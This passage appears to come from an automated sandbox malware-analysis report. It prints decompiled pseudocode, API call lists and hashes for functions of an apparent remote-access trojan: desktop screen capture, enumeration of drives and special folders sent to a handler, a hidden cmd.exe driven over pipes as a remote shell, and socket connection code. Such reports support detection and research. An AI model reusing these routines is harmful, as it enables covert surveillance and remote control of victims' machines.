				_t139 = __ecx;
				asm("movups [ebp-0x3c], xmm0");
				_push(__esi);
				asm("movaps xmm0, [0x4efe890]");
				asm("movups [ebp-0x2c], xmm0");
				_t2 = _t139 + 0xc4; // 0xc4
				_t157 = _t2;
				 *__ecx = 0x4efdcb4;
				asm("movaps xmm0, [0x4efe880]");
				_push(__edi);
				 *((intOrPtr*)(__ecx + 0x80)) = 0x4efdc9c;
				_t153 = 0;
				asm("movups [ebp-0x1c], xmm0");
				do {
					 *(_t157 - 0x40) =  *(_t164 + _t153 * 4 - 0x4c);
					_t96 = LoadCursorW(0,  *(_t164 + _t153 * 4 - 0x4c));
					_t153 = _t153 + 1;
					 *_t157 = _t96;
					_t157 =  &(_t157[1]);
				} while (_t153 < 0x10);
				_t142 = _a4;
				_t97 = _t142 - 1;
				if(_t97 > 0x1f) {
					L5:
					 *(_t139 + 0x68) = 0x20;
				} else {
					switch( *((intOrPtr*)(( *(_t97 + 0x4ec2624) & 0x000000ff) * 4 +  &M04EC261C))) {
						case 0:
							goto L4;
						case 1:
							goto L5;
					}
				}
				_t98 = E04EC5530(_t139, _t153, _t157);
				_t170 = _t98;
				if(_t98 != 0) {
					ReleaseDC( *(_t139 + 0x104),  *(_t139 + 0x3c));
				}
				_t99 = GetDesktopWindow();
				 *(_t139 + 0x104) = _t99;
				 *(_t139 + 0x3c) = GetDC(_t99);
				 *((intOrPtr*)(_t139 + 0x10)) = 0xcc0020;
				 *((char*)(_t139 + 4)) = 2;
				 *((intOrPtr*)(_t139 + 8)) = 0x64;
				 *((char*)(_t139 + 0xc)) = _a8;
				_t102 = GetDesktopWindow();
				__imp__MonitorFromWindow(_t102, 2);
				_v184.cbSize = 0x68;
				GetMonitorInfoW(_t102,  &_v184);
				_v408.dmSize = 0xdc;
				EnumDisplaySettingsW( &_v144, 0xffffffff,  &_v408);
				 *(_t139 + 0x20) = _v408.dmPelsWidth;
				 *(_t139 + 0x24) = _v408.dmPelsHeight;
				asm("cdq");
				 *((char*)(_t139 + 0x1c)) = 0x20 /  *(_t139 + 0x68);
				 *(_t139 + 0x28) = 0;
				 *(_t139 + 0x44) = CreateCompatibleDC( *(_t139 + 0x3c));
				 *(_t139 + 0x78) = CreateCompatibleDC( *(_t139 + 0x3c));
				 *(_t139 + 0x40) = CreateCompatibleDC(0);
				_t114 = CreateCompatibleDC(0);
				_t48 = _t139 + 0x54; // 0x54
				_t160 = _t48;
				 *(_t139 + 0x48) = _t114;
				_t51 = _t139 + 0x58; // 0x58
				_t154 = _t51;
				 *_t160 = 0;
				 *_t154 = 0;
				 *(_t139 + 0x5c) = E04EC2880(_t139,  *(_t139 + 0x68),  *(_t139 + 0x20), 1);
				 *(_t139 + 0x60) = E04EC2880(_t139,  *(_t139 + 0x68),  *(_t139 + 0x20),  *(_t139 + 0x24));
				 *((intOrPtr*)(_t139 + 0x64)) = E04EC2880(_t139,  *(_t139 + 0x68),  *(_t139 + 0x20), 1);
				 *(_t139 + 0x4c) = CreateDIBSection( *(_t139 + 0x3c),  *(_t139 + 0x5c), 0, _t160, 0, 0);
				 *(_t139 + 0x50) = CreateDIBSection( *(_t139 + 0x3c),  *(_t139 + 0x60), 0, _t154, 0, 0);
				_t66 = _t139 + 0x70; // 0x70
				 *(_t139 + 0x7c) = CreateDIBSection( *(_t139 + 0x3c),  *(_t139 + 0x60), 0, _t66, 0, 0);
				SelectObject( *(_t139 + 0x44),  *(_t139 + 0x50));
				SelectObject( *(_t139 + 0x40),  *(_t139 + 0x4c));
				SelectObject( *(_t139 + 0x78),  *(_t139 + 0x7c));
				SetRect(_t139 + 0x2c, 0, 0,  *(_t139 + 0x20),  *(_t139 + 0x24));
				 *((intOrPtr*)(_t139 + 0x14)) = E04ED5785(_t139, SelectObject, _t170);
				 *(_t139 + 0x6c) =  *(_t139 + 0x60)->bmiHeader.biSizeImage /  *(_t139 + 0x24);
				 *(_t139 + 0x18) = 0;
				return E04ED572E(_v12 ^ _t164,  *(_t139 + 0x60)->bmiHeader.biSizeImage +  *(_t139 + 0x60)->bmiHeader.biSizeImage);
			}





















                                                                                    0x04ec23b9
                                                                                    0x04ec23c0
                                                                                    0x04ec23c3
                                                                                    0x04ec23ca
                                                                                    0x04ec23ce
                                                                                    0x04ec23cf
                                                                                    0x04ec23d6
                                                                                    0x04ec23d8
                                                                                    0x04ec23dc
                                                                                    0x04ec23dd
                                                                                    0x04ec23e4
                                                                                    0x04ec23e8
                                                                                    0x04ec23e8
                                                                                    0x04ec23ee
                                                                                    0x04ec23f4
                                                                                    0x04ec23fb
                                                                                    0x04ec23fc
                                                                                    0x04ec2406
                                                                                    0x04ec2408
                                                                                    0x04ec2410
                                                                                    0x04ec2417
                                                                                    0x04ec241a
                                                                                    0x04ec2420
                                                                                    0x04ec2421
                                                                                    0x04ec2423
                                                                                    0x04ec2426
                                                                                    0x04ec242b
                                                                                    0x04ec242e
                                                                                    0x04ec2434
                                                                                    0x04ec2449
                                                                                    0x04ec2449
                                                                                    0x04ec2436
                                                                                    0x04ec243d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec243d
                                                                                    0x04ec2450
                                                                                    0x04ec2455
                                                                                    0x04ec2457
                                                                                    0x04ec2462
                                                                                    0x04ec2462
                                                                                    0x04ec246e
                                                                                    0x04ec2471
                                                                                    0x04ec247d
                                                                                    0x04ec2483
                                                                                    0x04ec248a
                                                                                    0x04ec248e
                                                                                    0x04ec2495
                                                                                    0x04ec2498
                                                                                    0x04ec249d
                                                                                    0x04ec24a9
                                                                                    0x04ec24b5
                                                                                    0x04ec24c1
                                                                                    0x04ec24d5
                                                                                    0x04ec24e1
                                                                                    0x04ec24ea
                                                                                    0x04ec24f2
                                                                                    0x04ec24ff
                                                                                    0x04ec2502
                                                                                    0x04ec250e
                                                                                    0x04ec2515
                                                                                    0x04ec251c
                                                                                    0x04ec251f
                                                                                    0x04ec2526
                                                                                    0x04ec2526
                                                                                    0x04ec2529
                                                                                    0x04ec252f
                                                                                    0x04ec252f
                                                                                    0x04ec2532
                                                                                    0x04ec253a
                                                                                    0x04ec254a
                                                                                    0x04ec255f
                                                                                    0x04ec257a
                                                                                    0x04ec2582
                                                                                    0x04ec2598
                                                                                    0x04ec259b
                                                                                    0x04ec25b5
                                                                                    0x04ec25b8
                                                                                    0x04ec25c0
                                                                                    0x04ec25c8
                                                                                    0x04ec25d8
                                                                                    0x04ec25ec
                                                                                    0x04ec2603
                                                                                    0x04ec2609
                                                                                    0x04ec2619

                                                                                    APIs
                                                                                    • LoadCursorW.USER32(00000000,?), ref: 04EC241A
                                                                                      • Part of subcall function 04EC5530: GetCurrentThreadId.KERNEL32 ref: 04EC5548
                                                                                      • Part of subcall function 04EC5530: GetThreadDesktop.USER32(00000000), ref: 04EC554F
                                                                                      • Part of subcall function 04EC5530: GetUserObjectInformationA.USER32 ref: 04EC558F
                                                                                      • Part of subcall function 04EC5530: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 04EC559A
                                                                                      • Part of subcall function 04EC5530: GetUserObjectInformationA.USER32 ref: 04EC55CE
                                                                                      • Part of subcall function 04EC5530: lstrcmpiA.KERNEL32(?,?), ref: 04EC55DE
                                                                                      • Part of subcall function 04EC5530: SetThreadDesktop.USER32(00000000), ref: 04EC55E9
                                                                                      • Part of subcall function 04EC5530: CloseDesktop.USER32(?), ref: 04EC55FD
                                                                                      • Part of subcall function 04EC5530: CloseDesktop.USER32(00000000), ref: 04EC5600
                                                                                    • ReleaseDC.USER32 ref: 04EC2462
                                                                                    • GetDesktopWindow.USER32 ref: 04EC246E
                                                                                    • GetDC.USER32(00000000), ref: 04EC2477
                                                                                    • GetDesktopWindow.USER32 ref: 04EC2498
                                                                                    • MonitorFromWindow.USER32(00000000,00000002), ref: 04EC249D
                                                                                    • GetMonitorInfoW.USER32 ref: 04EC24B5
                                                                                    • EnumDisplaySettingsW.USER32 ref: 04EC24D5
                                                                                    • CreateCompatibleDC.GDI32(?), ref: 04EC2509
                                                                                    • CreateCompatibleDC.GDI32(?), ref: 04EC2511
                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 04EC2518
                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 04EC251F
                                                                                    • CreateDIBSection.GDI32(?,?,00000000,00000054,00000000,00000000), ref: 04EC2580
                                                                                    • CreateDIBSection.GDI32(?,?,00000000,00000058,00000000,00000000), ref: 04EC2592
                                                                                    • CreateDIBSection.GDI32(?,?,00000000,00000070,00000000,00000000), ref: 04EC25A7
                                                                                    • SelectObject.GDI32(?,?), ref: 04EC25B8
                                                                                    • SelectObject.GDI32(?,?), ref: 04EC25C0
                                                                                    • SelectObject.GDI32(?,?), ref: 04EC25C8
                                                                                    • SetRect.USER32 ref: 04EC25D8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateDesktop$Object$Compatible$SectionSelectThreadWindow$CloseInformationMonitorUser$CurrentCursorDisplayEnumFromInfoInputLoadOpenRectReleaseSettingslstrcmpi
                                                                                    • String ID: $ $d$h
                                                                                    • API String ID: 1416193606-3710049695
                                                                                    • Opcode ID: 21f141cc987132b1d398108ae92f5e436a77f95d6f4951dbca0add57afce2f20
                                                                                    • Instruction ID: aafc53be051eeb28139ffa4a51b3bb977eca62e093b41cf5c0b862bfc0e0837f
                                                                                    • Opcode Fuzzy Hash: 21f141cc987132b1d398108ae92f5e436a77f95d6f4951dbca0add57afce2f20
                                                                                    • Instruction Fuzzy Hash: 368136B1900204EBEF159F69CC84B997FB5FF08304F1441AAEE049B26AD775E955CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB48F0, Relevance: 34.7, APIs: 23, Instructions: 226stringmemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 73%
                                                                                    			E04EB48F0(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi) {
				signed int _v8;
				short _v1052;
				short _v2092;
				struct _SHFILEINFOW _v2788;
				intOrPtr _v2792;
				signed int _v2796;
				union _ULARGE_INTEGER* _v2800;
				intOrPtr _v2804;
				signed int _v2808;
				signed int _v2816;
				union _ULARGE_INTEGER _v2820;
				signed int _v2824;
				union _ULARGE_INTEGER _v2828;
				signed int _t83;
				signed int _t98;
				int _t114;
				int _t121;
				signed int _t136;
				void* _t156;
				signed int _t157;
				WCHAR* _t167;
				intOrPtr* _t168;
				void* _t170;
				void* _t175;
				void* _t176;
				void* _t178;
				intOrPtr _t180;
				intOrPtr _t183;
				void* _t184;
				void* _t185;
				signed int _t186;
				void* _t187;
				void* _t191;

				_t157 = __ecx;
				_t83 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t83 ^ _t186;
				_v2808 = __ecx;
				_t156 = LocalAlloc(0x40, 0x800);
				 *_t156 = 0x68;
				GetLogicalDriveStringsW(0x208,  &_v2092);
				_t167 =  &_v2092;
				asm("xorps xmm0, xmm0");
				_t175 = 1;
				asm("movlpd [ebp-0xb00], xmm0");
				asm("movlpd [ebp-0xb08], xmm0");
				if(_v2092 != 0) {
					do {
						E04EDDAD0(_t167,  &_v1052, 0, 0x410);
						_t191 = _t187 + 0xc;
						GetVolumeInformationW(_t167, 0, 0, 0, 0, 0,  &_v1052, 0x208);
						SHGetFileInfoW(_t167, 0x80,  &_v2788, 0x2b4, 0x410);
						_v2804 = 2 + lstrlenW( &(_v2788.szTypeName)) * 2;
						_v2792 = 2 + lstrlenW( &_v1052) * 2;
						_t136 =  *_t167 & 0x0000ffff;
						if(_t136 == 0x41 || _t136 == 0x42 || GetDiskFreeSpaceExW(_t167,  &_v2828,  &_v2820, 0) == 0) {
							_v2796 = 0;
							_v2800 = 0;
						} else {
							_v2796 = (_v2816 << 0x00000020 | _v2820.LowPart) >> 0x14;
							_t157 = (_v2824 << 0x00000020 | _v2828.LowPart) >> 0x14;
							_v2800 = _t157;
						}
						 *((short*)(_t175 + _t156)) =  *_t167;
						 *((char*)(_t175 + _t156 + 2)) = GetDriveTypeW(_t167);
						 *(_t175 + _t156 + 6) = _v2796;
						 *(_t175 + _t156 + 0xa) = _v2800;
						_t184 = _t175 + 0xe;
						E04EDDC90(_t184 + _t156,  &(_v2788.szTypeName), _v2804);
						_t185 = _t184 + _v2804;
						E04EDDC90(_t185 + _t156,  &_v1052, _v2792);
						_t175 = _t185 + _v2792;
						_t187 = _t191 + 0x18;
						_t167 =  &(( &(_t167[lstrlenW(_t167)]))[1]);
					} while ( *_t167 != 0);
				}
				_t168 = __imp__SHGetSpecialFolderPathW;
				_t176 = _t175 + 2;
				 *((short*)(_t176 + _t156 - 2)) = 0;
				 *_t168(0,  &_v1052, 0x10, 0);
				E04EDDC90(_t176 + _t156,  &_v1052, 2 + lstrlenW( &_v1052) * 2);
				_t98 = lstrlenW( &_v1052);
				_t178 = _t176 + _t98 * 2 + 2;
				 *_t168(0,  &_v1052, 5, 0);
				E04EDDC90(_t178 + _t156,  &_v1052, 2 + lstrlenW( &_v1052) * 2);
				_t180 = _t178 + lstrlenW( &_v1052) * 2 + 2;
				_v2792 = _t180;
				_t170 = E04EB47A0();
				if(_t170 != 0) {
					_t114 = LocalSize(_t170);
					if(_t180 + _t114 <= LocalSize(_t156)) {
						_t183 = _v2792;
					} else {
						_t121 = LocalSize(_t170);
						_t183 = _v2792;
						_t156 = LocalReAlloc(_t156, _t121 + _t183, 0x42);
					}
					E04EDDC90(_t183 + _t156, _t170, LocalSize(_t170));
					_t180 = _t183 + LocalSize(_t170);
					LocalFree(_t170);
				}
				_push(_t157);
				_push(0x3f);
				_push(_t180);
				E04EB1C60( *((intOrPtr*)(_v2808 + 4)));
				LocalFree(_t156);
				return E04ED572E(_v8 ^ _t186, _t156);
			}




































                                                                                    0x04eb48f0
                                                                                    0x04eb48f9
                                                                                    0x04eb4900
                                                                                    0x04eb490d
                                                                                    0x04eb4919
                                                                                    0x04eb4927
                                                                                    0x04eb492a
                                                                                    0x04eb4938
                                                                                    0x04eb493e
                                                                                    0x04eb4941
                                                                                    0x04eb4946
                                                                                    0x04eb494e
                                                                                    0x04eb4956
                                                                                    0x04eb4960
                                                                                    0x04eb496e
                                                                                    0x04eb4973
                                                                                    0x04eb498d
                                                                                    0x04eb49aa
                                                                                    0x04eb49c4
                                                                                    0x04eb49de
                                                                                    0x04eb49e4
                                                                                    0x04eb49ea
                                                                                    0x04eb4a40
                                                                                    0x04eb4a4a
                                                                                    0x04eb4a0c
                                                                                    0x04eb4a25
                                                                                    0x04eb4a31
                                                                                    0x04eb4a35
                                                                                    0x04eb4a3b
                                                                                    0x04eb4a58
                                                                                    0x04eb4a68
                                                                                    0x04eb4a72
                                                                                    0x04eb4a7c
                                                                                    0x04eb4a80
                                                                                    0x04eb4a8e
                                                                                    0x04eb4a93
                                                                                    0x04eb4aaa
                                                                                    0x04eb4aaf
                                                                                    0x04eb4ab5
                                                                                    0x04eb4ac2
                                                                                    0x04eb4ac5
                                                                                    0x04eb4960
                                                                                    0x04eb4acf
                                                                                    0x04eb4ad5
                                                                                    0x04eb4adb
                                                                                    0x04eb4aeb
                                                                                    0x04eb4b0d
                                                                                    0x04eb4b1c
                                                                                    0x04eb4b32
                                                                                    0x04eb4b35
                                                                                    0x04eb4b59
                                                                                    0x04eb4b6d
                                                                                    0x04eb4b70
                                                                                    0x04eb4b7b
                                                                                    0x04eb4b7f
                                                                                    0x04eb4b82
                                                                                    0x04eb4b93
                                                                                    0x04eb4bb2
                                                                                    0x04eb4b95
                                                                                    0x04eb4b98
                                                                                    0x04eb4b9e
                                                                                    0x04eb4bae
                                                                                    0x04eb4bae
                                                                                    0x04eb4bc5
                                                                                    0x04eb4bdb
                                                                                    0x04eb4bdd
                                                                                    0x04eb4bdd
                                                                                    0x04eb4be7
                                                                                    0x04eb4bee
                                                                                    0x04eb4bf0
                                                                                    0x04eb4bf5
                                                                                    0x04eb4bfd
                                                                                    0x04eb4c11

                                                                                    APIs
                                                                                    • LocalAlloc.KERNEL32(00000040,00000800), ref: 04EB4913
                                                                                    • GetLogicalDriveStringsW.KERNEL32(00000208,?), ref: 04EB492A
                                                                                    • GetVolumeInformationW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000208), ref: 04EB498D
                                                                                    • SHGetFileInfoW.SHELL32(00000000,00000080,?,000002B4,00000410), ref: 04EB49AA
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EB49B7
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EB49D1
                                                                                    • GetDiskFreeSpaceExW.KERNEL32(00000000,?,?,00000000), ref: 04EB4A02
                                                                                    • GetDriveTypeW.KERNEL32(00000000), ref: 04EB4A5C
                                                                                    • lstrlenW.KERNEL32(00000000), ref: 04EB4AB9
                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 04EB4AEB
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EB4AF4
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EB4B1C
                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000005,00000000), ref: 04EB4B35
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EB4B44
                                                                                    • lstrlenW.KERNEL32(?), ref: 04EB4B68
                                                                                    • LocalSize.KERNEL32 ref: 04EB4B82
                                                                                    • LocalSize.KERNEL32 ref: 04EB4B8B
                                                                                    • LocalSize.KERNEL32 ref: 04EB4B98
                                                                                    • LocalReAlloc.KERNEL32(00000000,00000000), ref: 04EB4BA8
                                                                                    • LocalSize.KERNEL32 ref: 04EB4BB9
                                                                                    • LocalSize.KERNEL32 ref: 04EB4BCE
                                                                                    • LocalFree.KERNEL32(00000000), ref: 04EB4BDD
                                                                                    • LocalFree.KERNEL32(00000000,00000000,?,0000003F), ref: 04EB4BFD
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$lstrlen$Size$Free$AllocDriveFolderPathSpecial$DiskFileInfoInformationLogicalSpaceStringsTypeVolume
                                                                                    • String ID:
                                                                                    • API String ID: 4186219405-0
                                                                                    • Opcode ID: ccacce76ae5df70b84121ff1c085efb25941a4c81b543e2edb90c1b35b0bea03
                                                                                    • Instruction ID: 5480798a2541f28e0cce0d1b6a69f8f1cd831d3dfcb0c06e3829026ae0b84388
                                                                                    • Opcode Fuzzy Hash: ccacce76ae5df70b84121ff1c085efb25941a4c81b543e2edb90c1b35b0bea03
                                                                                    • Instruction Fuzzy Hash: 549170B1A002199BDB20DB60DC44BEBB7BCEB85305F0140A9E949E7141EB74AE85CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC3BA0, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 183pipesleepprocessCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 78%
                                                                                    			E04EC3BA0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v12;
				short _v536;
				char _v540;
				struct _SECURITY_ATTRIBUTES _v552;
				struct _PROCESS_INFORMATION _v568;
				struct _STARTUPINFOW _v640;
				signed int _t50;
				intOrPtr _t52;
				HANDLE* _t58;
				void* _t67;
				void* _t89;
				void* _t90;
				void* _t93;
				void* _t94;
				HANDLE* _t98;
				intOrPtr* _t106;
				HANDLE* _t108;
				signed int _t112;

				_t50 =  *0x4f03008; // 0x3d21fb31
				_v12 = _t50 ^ _t112;
				_t52 = _a4;
				_t106 = __ecx;
				 *__ecx = 0x4efd8b0;
				 *((intOrPtr*)(__ecx + 4)) = _t52;
				 *((intOrPtr*)(_t52 + 0x38)) = __ecx;
				 *(_t106 + 8) = CreateEventW(0, 1, 0, 0);
				asm("xorps xmm0, xmm0");
				 *_t106 = 0x4efdda4;
				asm("movq [ebp-0x220], xmm0");
				E04EDDAD0(_t106,  &_v640, 0, 0x44);
				asm("xorps xmm0, xmm0");
				asm("movups [ebp-0x234], xmm0");
				E04EDDAD0(_t106,  &_v536, 0, 0x208);
				 *(_t106 + 0xc) = 0;
				 *(_t106 + 0x10) = 0;
				_t58 = _t106 + 0x18;
				 *(_t106 + 0x14) = 0;
				_t100 = _t106 + 0xc;
				 *_t58 = 0;
				_t108 = _t106 + 0x10;
				_v552.nLength = 0xc;
				_t98 = _t106 + 0x14;
				_v552.lpSecurityDescriptor = 0;
				_v552.bInheritHandle = 1;
				if(CreatePipe(_t106 + 0xc, _t58,  &_v552, 0) != 0) {
					if(CreatePipe(_t98, _t108,  &_v552, 0) != 0) {
						E04EDDAD0(_t106,  &_v640, 0, 0x44);
						asm("xorps xmm0, xmm0");
						asm("movups [ebp-0x234], xmm0");
						GetStartupInfoW( &_v640);
						_v640.cb = 0x44;
						_v640.wShowWindow = 0;
						_v640.hStdInput =  *_t98;
						_t67 =  *(_t106 + 0x18);
						_v640.hStdError = _t67;
						_v640.hStdOutput = _t67;
						_v640.dwFlags = 0x101;
						GetSystemDirectoryW( &_v536, 0x104);
						lstrcatW( &_v536, L"\\cmd.exe");
						if(CreateProcessW( &_v536, 0, 0, 0, 1, 0x20, 0, 0,  &_v640,  &_v568) != 0) {
							 *(_t106 + 0x1c) = _v568.hProcess;
							 *((intOrPtr*)(_t106 + 0x20)) = _v568.hThread;
							_v540 = 0x85;
							E04EB1C60( *((intOrPtr*)(_t106 + 4)));
							WaitForSingleObject( *(_t106 + 8), 0xffffffff);
							Sleep(0x96);
							 *((intOrPtr*)(_t106 + 0x24)) = E04EC5430(E04EC3FA0, _t106, 0,  &_v540, 1);
							 *((intOrPtr*)(_t106 + 0x28)) = E04EC5430(E04EC40A0, _t106, 0, 0x3f, _t100);
						} else {
							CloseHandle( *(_t106 + 0xc));
							CloseHandle( *(_t106 + 0x10));
							CloseHandle( *_t98);
							CloseHandle( *(_t106 + 0x18));
						}
					} else {
						_t89 =  *_t108;
						if(_t89 != 0) {
							CloseHandle(_t89);
						}
						_t90 =  *_t98;
						if(_t90 != 0) {
							CloseHandle(_t90);
						}
					}
				} else {
					_t93 =  *(_t106 + 0xc);
					if(_t93 != 0) {
						CloseHandle(_t93);
					}
					_t94 =  *(_t106 + 0x18);
					if(_t94 != 0) {
						CloseHandle(_t94);
					}
				}
				return E04ED572E(_v12 ^ _t112);
			}





















                                                                                    0x04ec3ba9
                                                                                    0x04ec3bb0
                                                                                    0x04ec3bb3
                                                                                    0x04ec3bbb
                                                                                    0x04ec3bc3
                                                                                    0x04ec3bc9
                                                                                    0x04ec3bcc
                                                                                    0x04ec3bd7
                                                                                    0x04ec3bda
                                                                                    0x04ec3be3
                                                                                    0x04ec3bec
                                                                                    0x04ec3bf4
                                                                                    0x04ec3c02
                                                                                    0x04ec3c05
                                                                                    0x04ec3c14
                                                                                    0x04ec3c1c
                                                                                    0x04ec3c29
                                                                                    0x04ec3c30
                                                                                    0x04ec3c33
                                                                                    0x04ec3c3a
                                                                                    0x04ec3c3d
                                                                                    0x04ec3c47
                                                                                    0x04ec3c4a
                                                                                    0x04ec3c54
                                                                                    0x04ec3c57
                                                                                    0x04ec3c62
                                                                                    0x04ec3c74
                                                                                    0x04ec3cac
                                                                                    0x04ec3cda
                                                                                    0x04ec3ce8
                                                                                    0x04ec3ceb
                                                                                    0x04ec3cf3
                                                                                    0x04ec3cfb
                                                                                    0x04ec3d05
                                                                                    0x04ec3d0e
                                                                                    0x04ec3d14
                                                                                    0x04ec3d17
                                                                                    0x04ec3d1d
                                                                                    0x04ec3d2f
                                                                                    0x04ec3d39
                                                                                    0x04ec3d4b
                                                                                    0x04ec3d7c
                                                                                    0x04ec3da3
                                                                                    0x04ec3dae
                                                                                    0x04ec3dba
                                                                                    0x04ec3dc1
                                                                                    0x04ec3dcb
                                                                                    0x04ec3dd6
                                                                                    0x04ec3def
                                                                                    0x04ec3e05
                                                                                    0x04ec3d7e
                                                                                    0x04ec3d87
                                                                                    0x04ec3d8c
                                                                                    0x04ec3d90
                                                                                    0x04ec3d95
                                                                                    0x04ec3d95
                                                                                    0x04ec3cae
                                                                                    0x04ec3cae
                                                                                    0x04ec3cb8
                                                                                    0x04ec3cbb
                                                                                    0x04ec3cbb
                                                                                    0x04ec3cbd
                                                                                    0x04ec3cc1
                                                                                    0x04ec3cc8
                                                                                    0x04ec3cc8
                                                                                    0x04ec3cc1
                                                                                    0x04ec3c76
                                                                                    0x04ec3c76
                                                                                    0x04ec3c81
                                                                                    0x04ec3c84
                                                                                    0x04ec3c84
                                                                                    0x04ec3c86
                                                                                    0x04ec3c8b
                                                                                    0x04ec3c92
                                                                                    0x04ec3c92
                                                                                    0x04ec3c8b
                                                                                    0x04ec3e1a

                                                                                    APIs
                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 04EC3BCF
                                                                                    • CreatePipe.KERNEL32(00000000,?,?,00000000), ref: 04EC3C6C
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EC3C84
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EC3C92
                                                                                    • CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000), ref: 04EC3CA4
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EC3CBB
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EC3CC8
                                                                                    • GetStartupInfoW.KERNEL32(?), ref: 04EC3CF3
                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 04EC3D39
                                                                                    • lstrcatW.KERNEL32(?,\cmd.exe), ref: 04EC3D4B
                                                                                    • CreateProcessW.KERNEL32 ref: 04EC3D74
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EC3D87
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EC3D8C
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EC3D90
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EC3D95
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000001,0000003F), ref: 04EC3DCB
                                                                                    • Sleep.KERNEL32(00000096), ref: 04EC3DD6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$Create$Pipe$DirectoryEventInfoObjectProcessSingleSleepStartupSystemWaitlstrcat
                                                                                    • String ID: D$\cmd.exe
                                                                                    • API String ID: 3838570663-520541716
                                                                                    • Opcode ID: d89e141bf003bf4f0c5349a98fdbeb69ce5aae276283a3e11692c6ce9e91b1d1
                                                                                    • Instruction ID: b56bdea9e95453d5b7611a04524ec5e5d72a9da1ee583a505dab167edbd6d20b
                                                                                    • Opcode Fuzzy Hash: d89e141bf003bf4f0c5349a98fdbeb69ce5aae276283a3e11692c6ce9e91b1d1
                                                                                    • Instruction Fuzzy Hash: 84618771A40319BBDB10DF65DD49F99BBB8FF48705F104299A908E7180EB74BA94CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECD8E0, Relevance: 30.3, APIs: 20, Instructions: 346networkthreadtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 30%
                                                                                    			E04ECD8E0(void* __eax, void* __ebx, intOrPtr* __ecx, void* __edi, short* _a4, intOrPtr _a8) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				LARGE_INTEGER* _v24;
				signed int _v28;
				_Unknown_base(*)()* _v32;
				intOrPtr* _v44;
				signed int _v56;
				_Unknown_base(*)()* _v76;
				void* __esi;
				short* _t89;
				signed int _t92;
				signed int _t94;
				signed int _t101;
				signed int _t109;
				signed int _t112;
				void* _t118;
				signed int _t120;
				signed int _t122;
				signed int _t127;
				signed int _t132;
				signed int _t133;
				signed int _t136;
				signed int _t137;
				signed int _t138;
				void** _t140;
				signed int _t141;
				signed int _t144;
				signed int _t145;
				long _t149;
				intOrPtr _t152;
				signed int _t156;
				LARGE_INTEGER* _t159;
				long _t160;
				LARGE_INTEGER* _t167;
				intOrPtr* _t169;
				LARGE_INTEGER* _t178;
				_Unknown_base(*)()* _t189;
				intOrPtr* _t191;
				intOrPtr* _t197;
				_Unknown_base(*)()* _t200;
				intOrPtr* _t203;
				signed int _t210;
				signed int _t212;
				signed int _t216;
				LARGE_INTEGER* _t217;

				_t210 = _t216;
				_t189 = 0;
				_t197 = __ecx;
				if(_a8 == 0) {
					_t89 = _a4;
					__eflags =  *_t89 - 2;
					_t163 =  !=  ? 0x1c : 0x10;
					__imp__#4( *((intOrPtr*)(__ecx + 0x1c)), _t89,  !=  ? 0x1c : 0x10);
					__eflags = _t89 - 0xffffffff;
					if(_t89 == 0xffffffff) {
						goto L14;
					} else {
						__imp__WSAEventSelect( *((intOrPtr*)(__ecx + 0x1c)),  *((intOrPtr*)(__ecx + 0x20)), 0x23);
						__eflags = _t89 - 0xffffffff;
						if(_t89 == 0xffffffff) {
							goto L14;
						} else {
							 *(__ecx + 0x4c) = 1;
							 *(__ecx + 0x50) = 1;
							SetLastError(0);
							_t92 =  *((intOrPtr*)( *_t197 + 0x7c))();
							__eflags = _t92 - 2;
							if(_t92 != 2) {
								__imp__#19( *((intOrPtr*)(_t197 + 0x1c)), 0, 0, 0);
								__eflags = _t92 - 0xffffffff;
								if(_t92 != 0xffffffff) {
									goto L13;
								} else {
									__imp__#111();
